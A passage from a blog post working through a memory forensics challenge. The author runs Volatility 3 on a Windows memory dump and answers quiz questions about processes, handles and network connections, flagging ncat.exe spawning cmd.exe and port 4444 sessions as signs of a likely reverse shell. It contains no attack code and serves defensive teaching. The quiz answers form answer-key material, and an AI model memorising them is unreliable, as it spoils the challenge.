</pre></div></div><div><br /><div>From a different perspective:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ssh_logs/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.joblinks.JobLinks> job_links.txt
Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat job_links.txt | head --lines=6
Volatility 3 Framework 2.5.2
Offset(V) Name PID PPID Sess JobSess Wow64 Total Active Term JobLink Process
0xe78bf38b5080 MsMpEng.exe 4032 696 0 0 False 25 1 0 N/A (Original Process)
* 0xe78bf38b5080 </span><b><span style="color: #fcff01;">MsMpEng.exe </span></b><span style="color: white;"> 4032 696 0 0 False 0 0 0 Yes </span><span style="color: #fcff01;"><b> C:\Program Files\Windows Defender\MsMpEng.exe
</b></span></pre><div><br /></div></div></div><div><br /></div></div><div><b>Q:</b> What Database server is running on the system?</div><div><b>A:</b> MySQL. This is determined from <i>mysqld.exe</i>.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep --ignore-case "mysql"
9044 8100 </span><b><span style="color: #fcff01;">mysqld.exe </span></b><span style="color: white;"> 0xe78bf4fa5080 30 - 1 False 2023-11-16 23:26:13.000000 N/A Disabled</span>
</pre></div></div><div><br /></div><div><b>Q:</b> What web server is running on the system?</div><div><b>A:</b> httpd. Apache! https://httpd.apache.org/download.cgi</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep http
10008 8100 </span><b><span style="color: #fcff01;">httpd.exe</span></b><span style="color: white;"> 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled
5088 10008 </span><span style="color: #fcff01;">httpd.exe</span><span style="color: white;"> 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled</span>
</pre></div></div><div><br /></div></div><div><div>Even more process information:</div><div>So far we have looked at standalone processes; now let's move on to the relationships across processes.</div><div><br /></div><div>With a solid understanding of identifying processes, let's look at at least one more place.</div><div><br />First, get the process tree information into a file:</div></div><br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.txt
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div>Q: Which process has the most handles opened? What is the process name and process id?</div><div>A: The process is httpd.exe but there are two. However, the one with PID 5088 is what we need:</div><br /><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep http
**** 10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A
***** </span><b><span style="color: #fcff01;">5088 </span></b><span style="color: white;">10008 </span><b><span style="color: #fcff01;">httpd.exe</span></b><span style="color: white;"> 0xe78bf61b9080 </span><b><span style="color: #fcff01;"> 156 </span></b><span style="color: white;"> - 1 False 2023-11-16 23:26:16.000000 N/A</span>
</pre></div></div><div><br /><b>Update</b>: After revisiting this, it seems my <i>grep </i>on <i>http </i>was incorrect. This caught the <i>156</i> in the <i>Threads</i> column, not the handles. I changed my technique and instead decided to put this into a CSV file.<br /><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py </span><b><span style="color: #fcff01;">--renderer csv</span></b><span style="color: white;"> --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.csv</span></pre></div></div></div><div><br /></div><div>This CSV gives a better opportunity to sort the fields. Now when I sort the fields, it seems the handles information is empty here.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.csv | awk --field-separator=',' '{ print $7 }' | sort | uniq
-
Handles</span></pre></div></div><div><br /></div></div><div>Now we can see no handles are being reported here. Let's now try to do the same thing for the <i>pslist </i>plugin to see if we get some data we can work with.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py </span><b><span style="color: #fcff01;">--renderer csv</span></b><span style="color: white;"> --file SECURITYNIK-WIN-20231116-235706.dmp windows.pslist | cut -f 7 -d ',' | sort | uniq
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
-
Handles</span></pre></div></div><div><br /></div></div><div>Epic failure! :-) My initial answer was 156; this is obviously wrong! Why did I not just update the blog to reflect the new material and remove the incorrect answer? Great question! One of the problems with forensics is that we need to ensure we are validating our tools and techniques. This is why we should not rely on any one tool or technique but always try other ways or have our work peer reviewed. I am leaving my mistake above so you can see my errors, as I am human just like you :-) If you see any other errors, do let me know.</div><div><br /><br /></div><div><b>Q:</b> Starting at a count of 2 (**), which process has the largest count of children?</div><div><b>A:</b> The process with the most children is svchost.exe with process id 884.</div><div><br /></div><div>The process in the previous section spawned 22 children.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+' | wc --lines
23</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+'
** 884 696 svchost.exe 0xe78bf2c90080 19 - 0 False 2023-11-16 19:09:13.000000 N/A
*** 9736 884 backgroundTask 0xe78bf61b4080 7 - 1 False 2023-11-16 23:26:04.000000 N/A
*** 2576 884 TextInputHost. 0xe78bf33c1080 21 - 1 False 2023-11-16 19:25:22.000000 N/A
*** 6804 884 RuntimeBroker. 0xe78bf4e2d080 9 - 1 False 2023-11-16 19:25:24.000000 N/A
*** 7956 884 RuntimeBroker. 0xe78bf4e1e080 2 - 1 False 2023-11-16 19:57:25.000000 N/A
*** 3224 884 dllhost.exe 0xe78bf49c2080 7 - 1 False 2023-11-16 19:25:02.000000 N/A
*** 2168 884 WidgetService. 0xe78bf48c50c0 5 - 1 False 2023-11-16 19:30:23.000000 N/A
*** 2592 884 Microsoft.Phot 0xe78bf42bf0c0 15 - 1 False 2023-11-16 19:43:56.000000 N/A
*** 10152 884 smartscreen.ex 0xe78bf707a080 6 - 1 False 2023-11-16 23:56:53.000000 N/A
*** 820 884 ApplicationFra 0xe78bf52680c0 3 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 6204 884 ShellExperienc 0xe78bf33c4080 31 - 1 False 2023-11-16 19:25:21.000000 N/A
*** 2748 884 RuntimeBroker. 0xe78bf4521080 7 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 4944 884 WmiPrvSE.exe 0xe78bf3b95080 9 - 0 False 2023-11-16 19:09:59.000000 N/A
*** 8784 884 RuntimeBroker. 0xe78bf5cc3080 6 - 1 False 2023-11-16 23:56:45.000000 N/A
*** 5080 884 RuntimeBroker. 0xe78bf59c20c0 3 - 1 False 2023-11-16 19:43:59.000000 N/A
*** 3808 884 StartMenuExper 0xe78bf44cf080 16 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1376 884 RuntimeBroker. 0xe78bf49ac080 5 - 1 False 2023-11-16 19:24:57.000000 N/A
*** 1888 884 UserOOBEBroker 0xe78bf523b080 1 - 1 False 2023-11-16 19:30:30.000000 N/A
*** 1256 884 dllhost.exe 0xe78bf5ef3080 2 - 1 False 2023-11-16 22:50:53.000000 N/A
*** 1260 884 SearchHost.exe 0xe78bf44cc080 76 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1392 884 Widgets.exe 0xe78bf48e8080 5 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 3448 884 SystemSettings 0xe78bf52350c0 20 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 10108 884 backgroundTask 0xe78bf6ed10c0 8 - 1 False 2023-11-16 23:56:44.000000 N/A</span></pre></div></div><div><br /></div></div><div><div><b>Q:</b> Once again, starting at a count of 2 (**), which process has the largest count of grandchildren?</div><div><b>A:</b> The process with the largest number of grandchildren is cmd.exe with PID 2796 which was spawned by powershell.exe with PID 644.</div></div><div><div>This process has 11 grandchildren.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '\s+4668\s+|\s+2796\s+'
***** 2796 644 cmd.exe 0xe78bf68ce0c0 1 - 1 False 2023-11-16 21:29:22.000000 N/A
****** 4668 2796 chrome.exe 0xe78bf69ac0c0 43 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 9152 4668 chrome.exe 0xe78bf65570c0 15 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 6944 4668 chrome.exe 0xe78bf68a8080 15 - 1 False 2023-11-16 21:29:46.000000 N/A
******* 2392 4668 chrome.exe 0xe78bf658a0c0 18 - 1 False 2023-11-16 21:30:06.000000 N/A
******* 5188 4668 chrome.exe 0xe78bf6192080 15 - 1 False 2023-11-16 21:29:27.000000 N/A
******* 7364 4668 chrome.exe 0xe78bf4f60080 9 - 1 False 2023-11-16 21:29:40.000000 N/A
******* 904 4668 chrome.exe 0xe78c05e3d080 15 - 1 False 2023-11-16 21:29:49.000000 N/A
******* 7980 4668 chrome.exe 0xe78bf8e9b0c0 7 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 1356 4668 chrome.exe 0xe78bf69ce0c0 10 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 8628 4668 chrome.exe 0xe78bf69680c0 17 - 1 False 2023-11-16 21:30:11.000000 N/A
******* 8696 4668 chrome.exe 0xe78bf5337080 15 - 1 False 2023-11-16 21:29:31.000000 N/A
******* 9180 4668 chrome.exe 0xe78bf3b440c0 16 - 1 False 2023-11-16 21:29:25.000000 N/A</span>
</pre></div></div><div><br /><div>Looking at another svchost.exe, this time with PID 1652, we see it spawned ncat.exe as a child.</div><div><br /></div><div><b>Q:</b> Which process spawned ncat.exe?</div><div><b>A:</b> "<i>svchost.exe</i>" with PID 1652</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep ncat --before-context=2
** 1652 696 svchost.exe 0xe78bf2fb1080 11 - 0 False 2023-11-16 19:09:18.000000 N/A
*** 1432 1652 taskhostw.exe 0xe78bf42a4080 8 - 1 False 2023-11-16 19:24:45.000000 N/A
*** </span><b><span style="color: #fcff01;">896 </span></b><span style="color: white;">1652 </span><b><span style="color: #fcff01;">ncat.exe </span></b><span style="color: white;"> 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A</span>
</pre></div></div><div><br /></div></div><div>One final piece of process information. There are times when there are remnants of processes in memory.</div><div><br /></div><div>First up and as always, I write the information out to a file for easier and quicker processing.<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.psscan.PsScan > psscan.txt
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div>Do we have more processes being reported via PsScan than we saw in PsList?</div><div><br /></div><div><b>Q:</b> How many processes are reported in memory overall?</div><div><b>A:</b> There are 219 processes in memory overall:</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat psscan.txt | sed '1,4d' | wc --lines
219</span>
</pre></div></div><div><br /></div></div><div>I found it strange that this reported 219 when pslist reported 220. Maybe I cut out an extra line. Always something that can be revisited.</div><div><br /></div><div>Anyhow, moving on.</div><div><br /></div><div>With this process information gathered, time to look at network information.</div><div><br /></div><div>Write this information to a file:</div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.netstat.NetStat > netstat.txt</b></span><span style="color: white;">
Volatility was unable to read a requested page:nished
Page error 0x1800000028 in layer layer_name (Page Fault at entry 0x0 in table page directory)</span>
</pre></div></div><div><br /></div></div></div></div><div><div><b>Q:</b> How many network connections were either in a LISTENING, ESTABLISHED or CLOSED state at the time of this capture?</div><div><b>A:</b> 50 connections</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | wc --lines
50</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> Of those network connections found, how many were in LISTENING state?</div><div><b>A:</b> 44<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | grep LISTEN | wc --lines
44</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN
0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf274b4f0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274b4f0 TCPv6 :: 135 :: 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf00fd0d0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274a470 TCPv4 10.0.0.108 139 0.0.0.0 0 LISTENING 4 System 2023-11-16 19:09:08.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5be0 TCPv4 0.0.0.0 3306 0.0.0.0 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000
0xe78bf3af5be0 TCPv6 :: 3306 :: 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">...</span>
</pre></div></div><div><br /></div><div><b>Q:</b> Of those network connections found, how many were in "<i>ESTABLISHED</i>" state? </div><div>I am disappointed that we do not see the process id and name for these "<i>ESTABLISHED</i>" connections. We can see the PID and name for the "<i>LISTENING</i>" sockets, so ...</div><div><b>A:</b> 4</div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | grep EST | wc --lines
4</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep EST
0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - -
0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A
0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A
0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A</span></pre></div></div><div><br /></div></div><div><div><b>Q:</b> Of those network connections found, how many were in CLOSED state?</div><div><b>A:</b> There are 2 sessions in the CLOSED state</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | grep CLOSED
0xe78bf69bbb00 TCPv4 127.0.0.1 9999 127.0.0.1 50369 CLOSED - - N/A
0xe78bf33adaa0 TCPv4 127.0.0.1 9999 127.0.0.1 50366 CLOSED - - N/A</span>
</pre></div></div><div><br /></div></div><div><div>At this point, we should be able to build our network map of the connections. Let us do that!</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXQFkFYHRKIogyYGFusYC2FqbM9p_CQJGDhQjGVOq7kJWrX-oVnaSMeI-zJ12lfvoFAbk_E4RVhrIY7ItKjzf4kyLKyD_P_iOmSkPCM_tR5PFETr7Vui2CbA4eV4lZ6nxoedqAqjSvtpCnCIk5jEIi2WhnB62xA5oCmmJg1crim6IxpS8tFSbxMdgJ4lA/s770/snapshot%20map%20of%20network%20activities.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="770" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXQFkFYHRKIogyYGFusYC2FqbM9p_CQJGDhQjGVOq7kJWrX-oVnaSMeI-zJ12lfvoFAbk_E4RVhrIY7ItKjzf4kyLKyD_P_iOmSkPCM_tR5PFETr7Vui2CbA4eV4lZ6nxoedqAqjSvtpCnCIk5jEIi2WhnB62xA5oCmmJg1crim6IxpS8tFSbxMdgJ4lA/w640-h226/snapshot%20map%20of%20network%20activities.PNG" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div><br /></div><div><div>With the insights from network statistics, let's look to see if there are any remnants of connections in memory.</div><div><br /></div><div>As always, writing the information to a file for further analysis.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netscan.NetScan > netscan.txt
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div>Looking into memory, we see additional connections.</div><div>Comparing the ESTABLISHED sessions' ports with the <i>netscan</i> output:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | grep EST
0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - -
0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A
0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A
0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netscan.txt | grep --perl-regexp '\s+4444\s+|\s+443\s+|\s+22\s+'
0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa600 TCPv6 ::1 9999 :: 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000
0xe78bf2daa760 TCPv4 127.0.0.1 9999 0.0.0.0 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000
0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000</span>
</pre></div></div><div><br /></div></div><div><div>At first glance, <i>4444 </i>above in the <i>netscan</i> output had me thinking this was a port. However, from the memory dump, it seems this is the PID associated with <i>ssh.exe</i>. Why did I mention that point?! It is important that we do not introduce our biases into our analysis/investigation. It is even more important that we recognize those biases early. At the same time, if we look at the <i>netstat</i> output focusing on the <i>ESTABLISHED</i> sessions, we see there is a port <i>4444</i>. This is typically associated with Metasploit. Hence this may be a real problem for us.</div><div><br /></div><div>Moving on.</div><div><br /></div><div>Actually, I am very disappointed that I did not have the PIDs, Owner, etc., for the processes that were in <i>ESTABLISHED</i> state via netstat. This just made this self-paced learning a bit more interesting for me.</div><div><br /></div><div>Going back to the process tree:</div><div><br /></div><div><b>Q: </b>From the process information previously reviewed, how many "suspicious" processes do you see? Why do you consider these processes as suspicious?</div><div><br /></div><div><b>A:</b> There is <i>ncat.exe</i> with PID 896, which spawned <i>conhost.exe</i> with PID <i>6148 </i>and <i>cmd.exe </i>with PID <i>8724</i>. </div><div>Ncat is known as the <i>Swiss Army Knife </i>and can be used for many things. It does not come installed by default on Windows.</div><div>This means that so far we have 3 suspicious processes (at least for me).</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '\s+896\s+'
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A</span>
</pre></div></div><div><br /></div></div><div><div><b>Q: </b>What are the name(s) and Process ID(s) of these processes?</div><div><b>A:</b> I am also concerned about process vmtoolsd.exe with PID 7164, spawning the following processes:</div><div> ** cmd.exe > PID:5176</div><div> ** cmd.exe > PID:5176</div><div> ** cmd.exe > PID: 7072</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
